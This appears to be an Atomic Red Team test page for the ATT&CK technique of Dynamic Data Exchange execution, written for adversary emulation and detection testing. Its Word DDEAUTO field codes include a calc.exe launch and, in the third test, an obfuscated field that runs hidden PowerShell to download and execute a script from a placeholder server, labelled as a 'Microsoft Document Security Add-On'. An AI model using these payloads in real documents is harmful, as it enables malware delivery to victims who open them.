Try it using Invoke-Atomic

Inter-Process Communication: Dynamic Data Exchange

Description from ATT&CK

Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by Component Object Model, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017)

Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via Phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection )

DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a Command and Scripting Interpreter. DDE execution can be invoked remotely via Remote Services such as Distributed Component Object Model (DCOM).(Citation: Fireeye Hunting COM June 2019)

Atomic Tests

Atomic Test #1 - Execute Commands

Executes commands via DDE using Microsfot Word

Supported Platforms: windows

auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd



Run it with these steps! Open Microsoft Word

Insert tab -> Quick Parts -> Field

Choose = (Formula) and click ok.

After that, you should see a Field inserted in the document with an error "!Unexpected End of Formula", right-click the Field, and choose Toggle Field Codes.

The Field Code should now be displayed, change it to Contain the following:

{DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe" }


Atomic Test #2 - Execute PowerShell script via Word DDE

When the word document opens it will prompt the user to click ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script

Supported Platforms: windows

auto_generated_guid: 47c21fb6-085e-4b0d-b4d2-26d72c3830b3



Attack Commands: Run with command_prompt!

start "$PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx"

Atomic Test #3 - DDEAUTO

TrustedSec - Unicorn -

SensePost DDEAUTO -

Word VBA Macro

Dragon's Tail

Supported Platforms: windows

auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181



Run it with these steps!

  1. Open Word

  2. Insert tab -> Quick Parts -> Field

  3. Choose = (Formula) and click ok.

  4. Once the field is inserted, you should now see "!Unexpected End of Formula"

  5. Right-click the Field, choose "Toggle Field Codes"

  6. Paste in the code from Unicorn or SensePost

  7. Save the Word document.

  8. DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe"

  9. DDEAUTO "C:\Programs\Microsoft\Office\MSWord\..\..\..\..\windows\system32\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\v1.0\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http://<server>/download.ps1'); # " "Microsoft Document Security Add-On"